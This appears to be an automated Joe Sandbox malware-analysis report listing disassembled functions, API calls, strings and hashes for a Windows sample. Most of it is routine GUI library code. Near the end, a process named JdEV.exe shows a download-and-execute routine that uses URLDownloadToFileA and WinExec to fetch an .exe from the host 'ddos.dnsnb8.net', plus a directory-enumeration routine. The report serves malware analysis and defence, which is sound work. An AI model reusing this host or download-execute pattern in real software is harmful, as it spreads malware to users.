ShowWindow.USER32(?,?), ref: 002005E7

Strings

`2, xrefs: 002005A4

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$Show
String ID: `2
API String ID: 990937876-2259872102
Opcode ID: 0f926402c5697c0775c66e4ca858f65bd8eaae1456366bf95b6a24720ce5fb09
Instruction ID: 13e929d2931899ae1ecf0d6772c6e09aacfa8c613bbe823eeba3dcde0de35068
Opcode Fuzzy Hash: 0f926402c5697c0775c66e4ca858f65bd8eaae1456366bf95b6a24720ce5fb09
Instruction Fuzzy Hash: 1B01B1322517525BFB115E299CC5F67BBADFF90724F590028E9089B282DB38EC118AA1

Function 001CCCE3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetMonitorInfoW.USER32(?,?), ref: 001CCD08
CopyRect.USER32(?,?), ref: 001CCD1A

Strings

(, xrefs: 001CCD01

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: CopyInfoMonitorRect
String ID: (
API String ID: 2119610155-3887548279
Opcode ID: 94437652a4528207e651d75680d4e4f831e20d3b81887c06f6fc154e3c868bde
Instruction ID: 2d66e78b6d5bf7474169a37cb545ac3f0fde76d0f60ec439be23b9a89ac11ab2
Opcode Fuzzy Hash: 94437652a4528207e651d75680d4e4f831e20d3b81887c06f6fc154e3c868bde
Instruction Fuzzy Hash: B7119A71A006099FCB50DF99D585E9EBBF5EB18310B508869E45AE7610DB30FD41CFA1

Function 00215EA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,00000000), ref: 00215EEC
PtInRect.USER32(00000000,00000000,00000000), ref: 00215EFC

Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22

Strings

83/, xrefs: 00215EC7

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Exception@8H_prolog3ThrowWindow
String ID: 83/
API String ID: 1945185285-2323854675
Opcode ID: 930c063fe2e553d0d238f1d0d63f95286830229c2ee5c9f1ad4ad8e16df4bdb7
Instruction ID: ab3cbff3d4c1620cf5a81e522c1b541c41ed4a6151e8f5ca1964f64ad8adcc6b
Opcode Fuzzy Hash: 930c063fe2e553d0d238f1d0d63f95286830229c2ee5c9f1ad4ad8e16df4bdb7
Instruction Fuzzy Hash: 8501D632920619EFCB11DF94C844BEEB7F4FF64365F250069E805A7141DB70DE558B90

Function 001DE769 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 001D8C1E: GetModuleHandleW.KERNEL32(?,?,001DE796), ref: 001D8C2C
Part of subcall function 001D8C1E: LoadLibraryW.KERNEL32(?,?,001DE796), ref: 001D8C3C

GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 001DE79C
_memset.LIBCMT ref: 001DE7B5

Strings

DllGetVersion, xrefs: 001DE796

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc_memset
String ID: DllGetVersion
API String ID: 3385804498-2861820592
Opcode ID: dd3b88df1e94035156ba4aa4b3a3976ccd2653f881e2101f2ff959555105b37c
Instruction ID: 8e2dd2377e4e48c728655b36f6aa347a52c826f105da187a2ca84d48100448a3
Opcode Fuzzy Hash: dd3b88df1e94035156ba4aa4b3a3976ccd2653f881e2101f2ff959555105b37c
Instruction Fuzzy Hash: F201B171A00219ABD750EBBDDC81BEE77F8AB08754F500136FA05E7291EB709C058BE0

Function 001C9739 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 001C9761
PathFindExtensionW.SHLWAPI(?), ref: 001C9777

Part of subcall function 001C9583: GetProcAddress.KERNEL32(00000000,GetThreadPreferredUILanguages), ref: 001C95C8
Part of subcall function 001C9583: _memset.LIBCMT ref: 001C95F4
Part of subcall function 001C9583: _wcstoul.LIBCMT ref: 001C963C
Part of subcall function 001C9583: _wcslen.LIBCMT ref: 001C965D
Part of subcall function 001C9583: GetUserDefaultUILanguage.KERNEL32 ref: 001C966D
Part of subcall function 001C9583: ConvertDefaultLocale.KERNEL32(?), ref: 001C9694
Part of subcall function 001C9583: ConvertDefaultLocale.KERNEL32(?), ref: 001C96A3
Part of subcall function 001C9583: GetSystemDefaultUILanguage.KERNEL32 ref: 001C96AC
Part of subcall function 001C9583: ConvertDefaultLocale.KERNEL32(?), ref: 001C96C8
Part of subcall function 001C9583: ConvertDefaultLocale.KERNEL32(?), ref: 001C96D7

Strings

%s%s.dll, xrefs: 001C9782

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Default$ConvertLocale$Language$AddressExtensionFileFindModuleNamePathProcSystemUser_memset_wcslen_wcstoul
String ID: %s%s.dll
API String ID: 1415830068-1649984862
Opcode ID: 0a6c9797f556261db7755dfeaab104a92831fbc35bf70a11a6c5e900e4a52c54
Instruction ID: d9fb90eed1cc43ff52f43063b9c8d3549eec92203834f869ce5c17626f0a4731
Opcode Fuzzy Hash: 0a6c9797f556261db7755dfeaab104a92831fbc35bf70a11a6c5e900e4a52c54
Instruction Fuzzy Hash: 9E016271911218ABCB11DFA4EC89EEF77ADEF49300F0504A9A509EB051EA71DA458F90

Function 001EBAA2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 001EBAE4
RedrawWindow.USER32(?,00000000,00000000,00000585,00000000), ref: 001EBB14

Strings

To/, xrefs: 001EBAF8

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: ParentRedrawWindow
String ID: To/
API String ID: 3969678505-3711964495
Opcode ID: d247f8243066cf00589631036109325617b9f798b51df7f8d69d50f310c8da32
Instruction ID: 69b584ab6af6e44bdc7d061860c8bc1a8663fa5099ca7097c4b6488fde8d05b6
Opcode Fuzzy Hash: d247f8243066cf00589631036109325617b9f798b51df7f8d69d50f310c8da32
Instruction Fuzzy Hash: 7F01DF32304B40ABDB18AB26ED85F2F77EABFE4700F120429F55A87291DF70E8008B54

Function 002C636A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

_strcpy_s.LIBCMT ref: 002C637B
__invoke_watson.LIBCMT ref: 002C63CF

Part of subcall function 002C620A: _strcat_s.LIBCMT ref: 002C6229

Strings

-g,, xrefs: 002C63BD

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: __invoke_watson_strcat_s_strcpy_s
String ID: -g,
API String ID: 312943863-3618676002
Opcode ID: b4baa15f2154b6c698d56b0502d95028cb3e23974111dbf4b9ddce4dbb627a85
Instruction ID: edc4186fa65d6175446852e3f29a0007064eab3a5ada124e886dc56fb966d83d
Opcode Fuzzy Hash: b4baa15f2154b6c698d56b0502d95028cb3e23974111dbf4b9ddce4dbb627a85
Instruction Fuzzy Hash: C1F0C2B25403497FCF116E90CC06F963F5AAB01750F458265FE1946052E3328D74DB90

Function 0021DC33 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0021DC48
GetParent.USER32(?), ref: 0021DC6B

Strings

`2, xrefs: 0021DC57

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Parent
String ID: `2
API String ID: 975332729-2259872102
Opcode ID: 7bc4960d16135c6639e72231cf7ce07e32a74f977f237f8ea1a250b271b4d76c
Instruction ID: 1a41edbb421b9886c1e8f6244cb7e8f800913e6e53e57c4981706839e161668c
Opcode Fuzzy Hash: 7bc4960d16135c6639e72231cf7ce07e32a74f977f237f8ea1a250b271b4d76c
Instruction Fuzzy Hash: 70F0F6B2900215E7CB316767AC45E9F76EDEFA4321B210926F804A7200DB24DC10C594

Function 00239ABD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34registryclipboardCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00239AC4
RegisterClipboardFormatW.USER32(00000010), ref: 00239B0D

Strings

ToolbarButton%p, xrefs: 00239AFB

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: ClipboardFormatH_prolog3Register
String ID: ToolbarButton%p
API String ID: 1070914459-899657487
Opcode ID: 9de09840c185cedaa64d9d30c88fb39bea9b8fb49a80b17e79a6f7b19a23ccab
Instruction ID: 1ff7ff7052dd08f69a90745dc2b481bc4a019d2ea64cdecdeec78ef2ddd7d039
Opcode Fuzzy Hash: 9de09840c185cedaa64d9d30c88fb39bea9b8fb49a80b17e79a6f7b19a23ccab
Instruction Fuzzy Hash: D6F022708202059BCF02FF64EC86BADB368FF21314F049409F181632A2DFB09959CB65

Function 002936E1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 002936E8
GetProcAddress.KERNEL32(00000000,?), ref: 00293721

Part of subcall function 001C94E4: ActivateActCtx.KERNEL32(?,?,0031BB48,00000010,001C95B9,KERNEL32.DLL), ref: 001C9504

Strings

UxTheme.dll, xrefs: 00293701

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: ActivateAddressH_prolog3Proc
String ID: UxTheme.dll
API String ID: 323876227-352951104
Opcode ID: 704edf1d3e70b3b50bc1c7b7ae0c0321c8232b419593d3e8b3e144ab6fc73dec
Instruction ID: 3c7f59ca434651f3657c6de6f2aeb06904e55151c69df9b7200d9fb8af0392a8
Opcode Fuzzy Hash: 704edf1d3e70b3b50bc1c7b7ae0c0321c8232b419593d3e8b3e144ab6fc73dec
Instruction Fuzzy Hash: D6E06DF16642459BDF269FA5AC85BD97BDCBB14750F054048F805DB391CB30DB608B44

Function 001CFC61 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 001CFC77

Part of subcall function 002BF7E9: RaiseException.KERNEL32(001CA2E2,?,00000000,?,001CA2E2,?,?,001C106C,00000000), ref: 002BF82B

Strings

33, xrefs: 001CFC6C
33, xrefs: 001CFC70

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: ExceptionException@8RaiseThrow
String ID: 33$33
API String ID: 3976011213-2126567973
Opcode ID: 20119dd6927fc32f80cd3e391fcc1978ac66655c7dc669a81950f93ce524cff5
Instruction ID: f9b67d6be778a571c1e21bfdc00c87789631577f783b307de2035376a007f2de
Opcode Fuzzy Hash: 20119dd6927fc32f80cd3e391fcc1978ac66655c7dc669a81950f93ce524cff5
Instruction Fuzzy Hash: 90D05E3600420CBB4744A682DD46CCBBBACDA90760F208016F11442101AEB2AE2096A0

Function 001D61F6 Relevance: 5.0, APIs: 4, Instructions: 38COMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00333728,?,?,00000000,?,001D124C,00000010,00000008,001CF8A5,001CF83C,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D6230
InitializeCriticalSection.KERNEL32(?,?,?,00000000,?,001D124C,00000010,00000008,001CF8A5,001CF83C,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D6242
LeaveCriticalSection.KERNEL32(00333728,?,?,00000000,?,001D124C,00000010,00000008,001CF8A5,001CF83C,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D624F
EnterCriticalSection.KERNEL32(?,?,?,00000000,?,001D124C,00000010,00000008,001CF8A5,001CF83C,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D625F

Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
String ID:
API String ID: 2895727460-0
Opcode ID: 7f41f85e15efdb8ac8dfe30aaf0ca92789b6df18d2511d52295f0585edb5d2b8
Instruction ID: 46819b446d9151352014e09b61b710fa4e9ad3a17a906f160b411bf02b44cb92
Opcode Fuzzy Hash: 7f41f85e15efdb8ac8dfe30aaf0ca92789b6df18d2511d52295f0585edb5d2b8
Instruction Fuzzy Hash: 4FF02BB3A00208AFDB115B58ECCDB19B7AEEBE1756F014027F14487251DB34AA818A65

Function 001D11C5 Relevance: 5.0, APIs: 4, Instructions: 35COMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00333518,?,?,00000000,?,001D1699,?,00000004,001CF886,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D11D3
TlsGetValue.KERNEL32(003334FC,?,?,00000000,?,001D1699,?,00000004,001CF886,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D11E7
LeaveCriticalSection.KERNEL32(00333518,?,?,00000000,?,001D1699,?,00000004,001CF886,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D11FD
LeaveCriticalSection.KERNEL32(00333518,?,?,00000000,?,001D1699,?,00000004,001CF886,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D1208

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: CriticalSection$Leave$EnterValue
String ID:
API String ID: 3969253408-0
Opcode ID: bd4becc1e56c0c91973d2dbd7d68326b768b98257cb609f294f80bd7209b4449
Instruction ID: f2f58899a075887ce4f0469ce6ecb408721ad497b61f305d566cabfd10ea4b9c
Opcode Fuzzy Hash: bd4becc1e56c0c91973d2dbd7d68326b768b98257cb609f294f80bd7209b4449
Instruction Fuzzy Hash: 5BF05436240214BFC7208F54EC8CC1677EAEA8576532A4956F496D7221DB32F805CA50

Analysis Process: JdEV.exePID: 7800, Parent PID: 7720COMMON

Execution Graph

Execution Coverage:	28.8%
Dynamic/Decrypted Code Coverage:	10.4%
Signature Coverage:	8.4%
Total number of Nodes:	297
Total number of Limit Nodes:	11

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 003429E2 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 128
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00342A02
wsprintfA.USER32 ref: 00342A1A
memset.MSVCRT ref: 00342A44
lstrlen.KERNEL32(?), ref: 00342A54
lstrcpyn.KERNEL32(?,?,-00000001), ref: 00342A6C
strrchr.MSVCRT ref: 00342A7C
lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00342A9F
lstrlen.KERNEL32(Documents and Settings), ref: 00342AAE
memset.MSVCRT ref: 00342AC6
memset.MSVCRT ref: 00342ADA
FindFirstFileA.KERNEL32(?,?), ref: 00342AEF
memset.MSVCRT ref: 00342B13
lstrcmpiA.KERNEL32(?,?), ref: 00342B42
FindNextFileA.KERNEL32(00000000,?,?,?,?), ref: 00342B67
FindClose.KERNEL32(00000000), ref: 00342B6E

Strings

%s*, xrefs: 00342A14
Documents and Settings, xrefs: 00342A8D, 00342A92, 00342A9A, 00342AAD
C:\, xrefs: 00342A2F

Memory Dump Source

Source File: 00000003.00000002.1613253825.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true

Associated: 00000003.00000002.1613233553.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1613273850.0000000000343000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1613291177.0000000000344000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1613308995.0000000000346000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_340000_JdEV.jbxd

Similarity

API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
String ID: %s*$C:\$Documents and Settings
API String ID: 2826467728-110786608
Opcode ID: 0b69d69d4bfbb612d39ebf5f6f8bad037afc98ffa73f0f3dd070941fbedee314
Instruction ID: 332690293b092674da60294da31d36174d99916a04e17f538d55e9d3351f7277
Opcode Fuzzy Hash: 0b69d69d4bfbb612d39ebf5f6f8bad037afc98ffa73f0f3dd070941fbedee314
Instruction Fuzzy Hash: 7F4188B2404349AFD722DF90EC89DEB77ECEF85315F440929F945DB111EA34EA4887A2

Function 00341099 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 74
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0034185B: GetSystemTimeAsFileTime.KERNEL32(00341F92,00000000,?,00000000,?,?,?,00341F92,?,00000000,00000002), ref: 00341867
Part of subcall function 0034185B: srand.MSVCRT ref: 00341878
Part of subcall function 0034185B: rand.MSVCRT ref: 00341880
Part of subcall function 0034185B: srand.MSVCRT ref: 00341890
Part of subcall function 0034185B: rand.MSVCRT ref: 00341894

WinExec.KERNEL32(?,00000005), ref: 003410F1
lstrlen.KERNEL32(00344748), ref: 003410FA
wsprintfA.USER32 ref: 0034112A
wsprintfA.USER32 ref: 00341143
URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0034115B
lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 00341169
Sleep.KERNEL32 ref: 00341179

Strings

HG4, xrefs: 0034112C
cj/, xrefs: 00341135
%s%.8X.exe, xrefs: 00341124
ddos.dnsnb8.net, xrefs: 003410C8, 003410CF, 00341140, 00341168
http://%s:%d/%s/%s, xrefs: 003410C2, 00341141
C:\Users\user\AppData\Local\Temp\, xrefs: 00341119

Memory Dump Source

Source File: 00000003.00000002.1613253825.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true

Associated: 00000003.00000002.1613233553.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1613273850.0000000000343000.00000002.00000001.01000000.00000004.sdmpDownload File
